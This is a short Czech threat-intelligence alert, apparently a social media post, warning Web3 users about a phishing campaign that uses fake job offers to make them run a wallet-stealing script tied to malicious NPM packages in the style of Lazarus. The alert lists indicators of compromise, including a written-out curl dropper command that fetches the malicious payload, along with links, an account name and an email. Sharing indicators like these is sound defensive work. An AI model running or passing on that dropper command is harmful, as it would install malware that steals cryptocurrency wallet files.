🚨 Bezpečnostní TI upozornění 🚨

Podle komunitního partnera @1nf0s3cpt cílená aktivní phishingová kampaň útočí na uživatele Web3 s falešnými nabídkami práce (např. $120/hodina), aby je podvodně přiměla k provedení škodlivého skriptu, který krade soubory peněženky.

🔍 Klíčové IOCs:

🔸GitLab repo: https://t.co/ivGN93PS4b

🔸Droper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 Útočná metoda je velmi podobná předchozímu použití NPM balíčků od Lazaruse k šíření škodlivého kódu:

https://t.co/bBC4i2vYpA

🚨 Zjistili jsme, že byl právě publikován nový škodlivý NPM balíček:

https://t.co/SjgmO1FOIL

🔸Pravděpodobně spojený GitHub: apollo-hero

🔸Email nahrávače: skelstar125@gmail.com

⚠️ NIKDY neinstalujte ani nespouštějte neznámé balíčky nebo skripty. Vždy ověřujte zdroje.

#LAZARUS #Phishing